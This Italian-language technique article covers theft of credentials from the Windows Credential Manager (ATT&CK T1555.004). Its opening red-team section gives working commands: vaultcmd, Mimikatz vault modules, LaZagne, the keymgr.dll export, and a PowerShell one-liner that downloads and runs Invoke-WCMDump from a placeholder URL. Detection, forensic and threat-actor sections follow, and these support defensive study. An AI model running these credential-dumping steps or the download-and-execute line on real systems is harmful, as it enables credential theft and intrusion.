Furto Credenziali dal Credential Manager: Windows Credential Manager (T1555.004)

Il primo passo in un engagement red team è capire cosa il Credential Manager conserva sulla macchina compromessa. L'esecuzione nativa più immediata sfrutta vaultcmd.exe, presente di default su qualsiasi Windows moderno. Una sequenza tipica parte dall'enumerazione dei vault disponibili e prosegue con il listing delle credenziali contenute:

vaultcmd /list

Questo comando restituisce i GUID dei locker configurati. Per ispezionare il contenuto di un vault specifico si usa:

vaultcmd /listcreds:"{GUID-vault}" /all

Se l'obiettivo è ottenere un dump più completo, Mimikatz (open source) offre il modulo vault dedicato. In una sessione con privilegi elevati:

mimikatz # vault::list mimikatz # vault::cred

Il primo mostra i vault disponibili, il secondo enumera le credenziali memorizzate con i relativi metadati. Per estrarre anche le credenziali generiche di Windows (incluse quelle RDP), il modulo lsadump e sekurlsa completano l'opera, ma restano fuori dallo scope specifico di questa tecnica.

Un approccio più discreto, particolarmente apprezzato dagli operatori che vogliono evitare di caricare binari su disco, è l'uso di Invoke-WCMDump (open source), lo stesso script PowerShell impiegato da Wizard Spider. Si carica in memoria e enumera il Credential Manager senza toccare il filesystem:

powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('<URL-Invoke-WCMDump>'); Invoke-WCMDump"

Per un assessment più ampio, LaZagne (open source) automatizza il recupero credenziali da decine di sorgenti, inclusi i Vault file:

lazagne.exe all

Il flag all esegue tutti i moduli disponibili; per limitarsi al Credential Manager si può usare il modulo windows con il sottogruppo specifico.

Un'altra tecnica di interesse è l'abuso del backup del Credential Manager tramite la DLL nativa keymgr.dll. Eseguendo:

rundll32.exe keymgr.dll,KRShowKeyMgr

si apre la GUI "Stored User Names and Passwords", da cui è possibile esportare un backup delle credenziali. In un contesto di social engineering interno o accesso RDP, questo approccio non richiede alcun tool esterno.

Infine, PowerSploit (open source) include moduli nella categoria Exfiltration capaci di estrarre oggetti credenziali dal Windows Vault. Il cmdlet Get-VaultCredential rappresenta l'opzione nativa PowerShell per ambienti dove i tool compilati sono sorvegliati.

Per la catena d'attacco in laboratorio, la sequenza consigliata è: enumerazione con vaultcmd → conferma con Invoke-WCMDump → estrazione completa con Mimikatz → verifica credenziali su target laterali con net use o Enter-PSSession.

La detection di questa tecnica si fonda su tre pilastri: monitoraggio dei processi, accesso ai file del vault e chiamate API sospette. La buona notizia è che ciascuno di questi pilastri ha un segnale osservabile; la sfida sta nel separare l'uso legittimo dall'abuso.

Il primo indicatore da monitorare è l'esecuzione di vaultcmd.exe. In Sysmon, l'EventCode 1 (Process Creation) cattura ogni istanza di questo binario. In un ambiente enterprise tipico, vaultcmd.exe non viene praticamente mai eseguito da utenti umani: qualsiasi occorrenza merita un'indagine. Un filtro efficace correla il processo padre — se vaultcmd.exe viene lanciato da cmd.exe o powershell.exe in una sessione interattiva, la probabilità di attività malevola sale considerevolmente.

Il secondo indicatore riguarda rundll32.exe con argomento keymgr.dll. Anche questo è un evento raro in produzione. L'alert dovrebbe scattare su EventCode 1 di Sysmon quando la command line contiene sia keymgr.dll che KRShowKeyMgr.

Per gli accessi diretti ai file del vault, Sysmon EventCode 11 (FileCreate) e il Windows Security Log EventCode 4663 (Object Access) sui percorsi critici sono essenziali. Le directory da monitorare sono:

• %Systemdrive%\Users\*\AppData\Local\Microsoft\Credentials\
• %Systemdrive%\Users\*\AppData\Local\Microsoft\Vault\

Qualsiasi processo che legga file .vcrd o Policy.vpol al di fuori dei processi di sistema attesi (lsass.exe, svchost.exe) è anomalo. La correlazione temporale tra un EventCode 1 per un processo sospetto e un successivo EventCode 11 o 4663 nella stessa finestra di 30-60 secondi rappresenta un segnale ad alta fedeltà.

Per il rilevamento delle API CredEnumerateA/CredEnumerateW, Sysmon EventCode 10 (ProcessAccess) non è sufficiente da solo: è necessario un EDR che esegua hooking a livello di API o un provider ETW come Microsoft-Windows-Security-Auditing. Soluzioni come Elastic Endpoint Security (freemium) o Microsoft Defender for Endpoint (a pagamento) offrono visibilità nativa su queste chiamate.

Il tuning dei falsi positivi richiede una baseline degli account privilegiati. Service account legittimi, software di password management enterprise e script di onboarding IT potrebbero toccare il Credential Manager. La raccomandazione è creare una whitelist per processo+utente e rivederla trimestralmente.

Come controllo preventivo, la GPO "Network access: Do not allow storage of passwords and credentials for network authentication" riduce la superficie d'attacco impedendo al Credential Manager di memorizzare credenziali di rete, eliminando alla radice parte del bottino disponibile per l'attaccante.

L'analisi forense di un abuso del Credential Manager parte dai file stessi del vault. I file .vcrd sotto AppData\Local\Microsoft\Vault\ e AppData\Local\Microsoft\Credentials\ hanno timestamp NTFS che raccontano la loro storia: il $MFT registra le date di creazione, ultimo accesso e modifica. Un file Policy.vpol il cui ultimo accesso è recente ma la creazione risale a mesi prima suggerisce un'enumerazione tardiva da parte di un attore esterno.

Il primo artefatto da acquisire è il log Sysmon, se disponibile. L'EventCode 1 fornisce la command line completa di ogni processo creato, permettendo di ricostruire se vaultcmd.exe, rundll32.exe keymgr.dll o script PowerShell come Invoke-WCMDump sono stati eseguiti. I campi ParentImage e ParentCommandLine sono fondamentali per risalire alla catena di esecuzione — ad esempio, un vaultcmd.exe lanciato da un processo figlio di wmiprvse.exe indica un'esecuzione remota via WMI.

Sul fronte del registro eventi nativo Windows, il Security Log con EventCode 4688 (Process Creation, se abilitato con command line auditing) è l'alternativa quando Sysmon non è installato. L'EventCode 4663 cattura accessi agli oggetti file se l'auditing SACL è configurato sulle directory del vault.

Per la ricostruzione della timeline è utile incrociare diversi artefatti. I Prefetch files (sotto C:\Windows\Prefetch\) indicano l'esecuzione di binari: la presenza di VAULTCMD.EXE-*.pf o LAZAGNE.EXE-*.pf è un indicatore immediato, con timestamp dell'ultimo run e contatore delle esecuzioni. L'analisi dei Prefetch con tool come PECmd di Eric Zimmerman (open source) fornisce anche la lista delle directory e dei file referenziati durante l'esecuzione, confermando se i percorsi del vault sono stati toccati.

Le ShimCache (AppCompatCache) e il database AmCache rappresentano una seconda linea di evidenza per l'esecuzione di binari, particolarmente preziosa quando i Prefetch sono stati eliminati. Lo strumento AppCompatCacheParser (open source) di Eric Zimmerman estrae queste informazioni dal registro SYSTEM.

Se l'attaccante ha usato PowerShell, i log Microsoft-Windows-PowerShell/Operational con EventCode 4104 (Script Block Logging) possono contenere il codice intero di Invoke-WCMDump o dei moduli PowerSploit. Anche il file ConsoleHost_history.txt nella directory del profilo utente conserva la cronologia dei comandi PowerShell.

Nella costruzione della timeline, l'analista dovrebbe cercare la sequenza: arrivo del payload iniziale → esecuzione del tool di credential dumping → accesso ai file .vcrd/.vpol → eventuale esfiltrazione o riutilizzo delle credenziali per movimento laterale (logon EventCode 4624 tipo 3 o tipo 10 da un host inatteso).

Il panorama degli attori che abusano del Credential Manager rivela una tecnica trasversale a regioni e motivazioni diverse, segno che si tratta di un tassello tattico universalmente utile piuttosto che un marchio di fabbrica di un singolo cluster.

OilRig (G0049), il gruppo iraniano attribuito al Ministero dell'Intelligence, ha sviluppato un tool dedicato chiamato VALUEVAULT per il dump del Credential Manager. Questa scelta progettuale — costruire un tool custom anziché riutilizzare strumenti pubblici — è coerente con la tendenza di OilRig a mantenere tooling proprietario per le operazioni a medio-lungo termine. La campagna Juicy Mix (C0044), condotta nel corso del 2022 contro organizzazioni israeliane, ha confermato l'uso di un credential stealer specifico per il Windows Credential Manager, integrato nell'arsenale insieme alla backdoor Mango. Questo legame diretto tra la tecnica e una campagna documentata rende OilRig il caso di studio più completo per T1555.004.

Stealth Falcon (G0038), operante nell'area del Golfo Persico con interessi nel monitoraggio di dissidenti e attivisti, utilizza malware capace di raccogliere password dal Windows Credential Vault. Il profilo del gruppo si concentra su operazioni di sorveglianza mirata, dove le credenziali personali della vittima hanno valore diretto per l'intelligence.

Turla (G0010), il sofisticato gruppo russo con decenni di operazioni alle spalle, ha incluso il raccoglimento di credenziali dal Credential Manager nel suo toolkit. Per Turla questa tecnica rappresenta uno dei tanti vettori di credential harvesting in un arsenale estremamente vasto, utilizzato tipicamente nelle fasi post-compromissione di target governativi e diplomatici europei.

Wizard Spider (G0102), il gruppo cybercriminale di matrice russa noto per le operazioni ransomware TrickBot/Conti/Ryuk, si distingue per l'uso di Invoke-WCMDump, un tool PowerShell open source. La scelta di uno strumento pubblico riflette il modello operativo ad alto volume di Wizard Spider, dove la velocità di esecuzione prevale sulla necessità di evasione sofisticata.

Sul fronte software, la sovrapposizione tra tool è significativa. Mimikatz e LaZagne sono tool offensivi open source utilizzati trasversalmente sia da criminali che da APT statali. Lizar, legato a Wizard Spider, implementa sia l'approccio vaultcmd.exe che la chiamata API CredEnumerateW, dimostrando ridondanza operativa. Valak, ROKRAT, RainyDay, KGH_SPY e SILENTTRINITY confermano che il Credential Manager è un bersaglio standard per malware di diverse famiglie e origini.

Il trend emergente è chiaro: il Credential Manager è un obiettivo di raccolta credenziali "a basso costo" che quasi tutti gli attori integrano come modulo secondario. Per il threat intelligence officer, la presenza di questa tecnica in un incidente non è discriminante per l'attribuzione, ma il come viene eseguita — tool custom vs. open source, API call vs. CLI — fornisce indicatori utili per il clustering comportamentale.

Framework MITRE ATT&CK v16 — T1555.004 (Windows Credential Manager), TA0006, campagna C0044 (Juicy Mix). Tool di detection: Sysmon (EventCode 1, 11), Windows Security Log (EventCode 4663, 4688, 4624), PowerShell Script Block Logging (EventCode 4104), PECmd, AppCompatCacheParser. Integrato con conoscenza professionale per tool e procedure operative.